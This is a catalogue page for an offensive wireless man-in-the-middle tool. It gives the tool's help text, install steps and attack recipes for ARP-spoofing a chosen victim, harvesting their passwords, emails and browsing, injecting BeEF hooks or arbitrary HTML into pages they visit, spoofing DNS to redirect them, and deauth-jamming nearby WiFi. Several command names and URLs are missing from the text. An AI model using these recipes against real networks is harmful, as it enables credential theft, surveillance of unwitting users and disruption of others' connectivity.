You are here: Home » Sniffing & Spoofing » Description automatically finds the most active WLAN users then spies on one of them and/or inject arbitrary HTML/JS into pages they visit.

Individually poisons the ARP tables of the target box, the router and the DNS server if necessary. Does not poison anyone else on the network. Displays all most the interesting bits of their traffic and can inject custom html into pages they visit. Cleans up after itself.

Also can be used to continuously jam nearby WiFi networks. This has an approximate range of a 1 block radius, but this can vary based off of the strength of your WiFi card. This can be fine-tuned to allow jamming of everyone or even just one client. Cannot jam WiFi and spy simultaneously.


Author: Dan McInerney

License: GPLv3 Help

usage: [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS] [-vmac VICTIMMAC]
               [-d] [-v] [-dns DNSSPOOF] [-a] [-set] [-p] [-na] [-n]
               [-i INTERFACE] [-r REDIRECTTO] [-rip ROUTERIP]
               [-rmac ROUTERMAC] [-pcap PCAP] [-s SKIP] [-ch CHANNEL]
               [-m MAXIMUM] [-no] [-t TIMEINTERVAL] [--packets PACKETS]
               [--directedonly] [--accesspoint ACCESSPOINT] [--jam]
optional arguments:
  -h, --help            show this help message and exit
  -b BEEF, --beef BEEF  Inject a BeEF hook URL. Example usage: -b
  -c CODE, --code CODE  Inject arbitrary html. Example usage (include quotes):
                        -c '<title>New title</title>'
  -u, --urlspy          Show all URLs and search terms the victim visits or
                        enters minus URLs that end in .jpg, .png, .gif, .css,
                        and .js to make the output much friendlier. Also
                        truncates URLs at 150 characters. Use -v to print all
                        URLs and without truncation.
  -ip IPADDRESS, --ipaddress IPADDRESS
                        Enter IP address of victim and skip the arp ping at
                        the beginning which would give you a list of possible
                        targets. Usage: -ip <victim IP>
  -vmac VICTIMMAC, --victimmac VICTIMMAC
                        Set the victim MAC; by default the script will attempt
                        a few different ways of getting this so this option
                        hopefully won't be necessary
  -d, --driftnet        Open an xterm window with driftnet.
  -v, --verboseURL      Shows all URLs the victim visits but doesn't limit the
                        URL to 150 characters like -u does.
  -dns DNSSPOOF, --dnsspoof DNSSPOOF
                        Spoof DNS responses of a specific domain. Enter domain
                        after this argument. An argument like []
                        will match all subdomains of
  -a, --dnsall          Spoof all DNS responses
  -set, --setoolkit     Start Social Engineer's Toolkit in another window.
  -p, --post            Print unsecured HTTP POST loads, IMAP/POP/FTP/IRC/HTTP
                        usernames/passwords and incoming/outgoing emails. Will
                        also decode base64 encrypted POP/IMAP
                        username/password combos for you.
  -na, --nmapaggressive
                        Aggressively scan the target for open ports and
                        services in the background. Output to
               where is the
                        victim's IP.
  -n, --nmap            Scan the target for open ports prior to starting to
                        sniffing their packets.
  -i INTERFACE, --interface INTERFACE
                        Choose the interface to use. Default is the first one
                        that shows up in `ip route`.
  -r REDIRECTTO, --redirectto REDIRECTTO
                        Must be used with -dns DOMAIN option. Redirects the
                        victim to the IP in this argument when they visit the
                        domain in the -dns DOMAIN option
  -rip ROUTERIP, --routerip ROUTERIP
                        Set the router IP; by default the script with attempt
                        a few different ways of getting this so this option
                        hopefully won't be necessary
  -rmac ROUTERMAC, --routermac ROUTERMAC
                        Set the router MAC; by default the script with attempt
                        a few different ways of getting this so this option
                        hopefully won't be necessary
  -pcap PCAP, --pcap PCAP
                        Parse through a pcap file
  -s SKIP, --skip SKIP  Skip deauthing this MAC address. Example: -s
  -ch CHANNEL, --channel CHANNEL
                        Listen on and deauth only clients on the specified
                        channel. Example: -ch 6
  -m MAXIMUM, --maximum MAXIMUM
                        Choose the maximum number of clients to deauth. List
                        of clients will be emptied and repopulated after
                        hitting the limit. Example: -m 5
  -no, --noupdate       Do not clear the deauth list when the maximum (-m)
                        number of client/AP combos is reached. Must be used in
                        conjunction with -m. Example: -m 10 -n
                        Choose the time interval between packets being sent.
                        Default is as fast as possible. If you see scapy
                        errors like 'no buffer space' try: -t .00001
  --packets PACKETS     Choose the number of packets to send in each deauth
                        burst. Default value is 1; 1 packet to the client and
                        1 packet to the AP. Send 2 deauth packets to the
                        client and 2 deauth packets to the AP: -p 2
  --directedonly        Skip the deauthentication packets to the broadcast
                        address of the access points and only send them to
                        client/AP pairs
  --accesspoint ACCESSPOINT
                        Enter the MAC address of a specific access point to
  --jam                 Jam all wifi in range Usage Example

Common usage:

python -u -p

Active target identification which ARP spoofs the chosen target and outputs all the interesting non-HTTPS data they send or request. There's no -ip option so this will ARP scan the network, compare it to a live running promiscuous capture, and list all the clients on the network. Attempts to tag the targets with a Windows netbios name and prints how many data packets they are sending/receiving. The ability to capture data packets they send is very dependent on physical proximity and the power of your network card. Ctrl-C when you're ready and pick your target which it will then ARP spoof.

Supports interception and harvesting of data from the following protocols: HTTP, FTP, IMAP, POP3, IRC. Will print the first 135 characters of URLs visited and ignore URLs ending in .jpg, .jpeg, .gif, .css, .ico, .js, .svg, and .woff. Will also print all protocol username/passwords entered, searches made on any site, emails sent/received, and IRC messages sent/received.

Running without argument will give you the list of active targets and upon selecting one, it will act as a simple ARP spoofer.

Another common usage:

python -u -p -d -ip

-d: open an xterm with driftnet to see all images they view

-ip: target this IP address and skip the active targeting at the beginning

HTML injection:

python -b

Inject a BeEF hook URL into pages the victim visits. This just wraps the argument in <script> tags so you can really enter any location of a javascript file. Attempts to insert it after the first tag found in the page's HTML.

python -c '<title>Owned.</title>'

Inject arbitrary HTML into pages the victim visits. First tries to inject it after the first <head> tag and failing that, injects prior to the first </head> tag. This example will change the page title to 'Owned.'

Read from pcap:

python -pcap libpcapfilename -ip

To read from a pcap file you must include the target's IP address with the -ip option. It must also be in libpcap form which is the most common anyway. One advantage of reading from a pcap file is that you do not need to be root to execute the script.

DNS spoofing

python -a -r
python -dns

Example 1: The -a option will spoof every single DNS request the victim makes and when used in conjunction with -r it will redirect them to -r's argument address. The victim will be redirected to ( no matter what they type in the address bar.

Example 2: This will spoof the domain and subdomains of When there is no -r argument present with the -a or -dns arguments the script will default to sending the victim to the attacker's IP address. If the victim tries to go to they will be redirected to the attacker's IP.

Most aggressive usage:

python -v -d -p -n -na -set -a -r -c '<title>Owned.</title>' -b -ip

Jam all WiFi networks:

python --jam

Jam just one access point (router):

python --jam --accesspoint 01:MA:C0:AD:DY

How to install

Installation on Kali Linux

sudo apt-get install -y python-nfqueue python-scapy python-twisted nbtscan
git clone
sudo ./  --help Screenshots Tutorials

Related tools